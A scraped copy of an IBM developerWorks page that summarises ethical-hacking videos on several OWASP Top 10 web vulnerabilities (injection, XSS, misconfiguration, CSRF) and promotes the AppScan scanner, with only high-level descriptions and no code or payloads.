Professional Documents
Culture Documents
OWASP Top 10 Vulnerabilities
OWASP Top 10 Vulnerabilities
ibm.com/developerworks/library/se-owasptop10/index.html
OWASP
Free trial of AppScan Standard
IBM Security AppScan Standard helps you detect and correct many of the types of
security issues found in the OWASP top 10 list. You can download a trial version of
AppScan Standard and test it out for yourself.
As a further aid in understanding some of these vulnerabilities, the IBM Security Systems
Ethical Hacking team has prepared the following videos.
#1 Injection
Warren Moynihan defines injection and lists a few of the many examples of it. He then
provides a detailed example of how injection techniques might be used by a hacker to
gain access to otherwise protected data. Finally, he illustrates how you can use IBM
Security AppScan to find and eliminate this vulnerability.
Transcript
Transcript
1/4
#3 Cross-site scripting
In this video, Security Systems' Moynihan describes how hackers use cross-site cripting
(XSS) to send malicious code to websites. He demonstrates techniques that are used to
exploit this common vulnerability, and shows how IBM Security AppScan searches for
and identifies XSS vulnerabilities on an example website.
Transcript
Transcript
#5 Security misconfiguration
Misconfigured web servers provide hackers with opportunities to abuse websites. In this
video, Paul Ionesco shows how attackers take advantage of testing or debugging
features carelessly left enabled. The "least privilege" principle is recommended as a
method to mitigate the risk, and AppScan is shown to be effective in seeking out
examples.
Transcript
Transcript
Transcript
2/4
#8 Cross-site request forgery
Cross-site request forgery (CSRF) is currently ranked #8 on the OWASP top 10 chart and
is a commonly exploited vulnerability. Cross-site request forgery is a web application
vulnerability that makes it possible for an attacker to force a user to unknowingly
perform actions while they are logged into an application. Attackers commonly use CSRF
attacks to target cloud storage, social media, banking, and online shopping sites because
of the user information and actions available in those types of applications. In this video,
a member of the IBM Security Systems Ethical Hacking team explains the vulnerability,
explores the risks, tells you how to protect your web applications from the attack, and
demonstrates how AppScan Standard discovers the vulnerability.
Transcript
Transcript
Transcript
Conclusion
These are only a few of the security vulnerabilities modern web applications are subject
to. However, by following the tips provided in these videos and other help available from
IBM Security Systems, and by using advanced security software such as IBM AppScan,
website administrators can find, correct, and avoid these and other web security threats.
Downloadable resources
3/4
PDF of this content
Related topic
Webinar: Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10
from Happening to You
4/4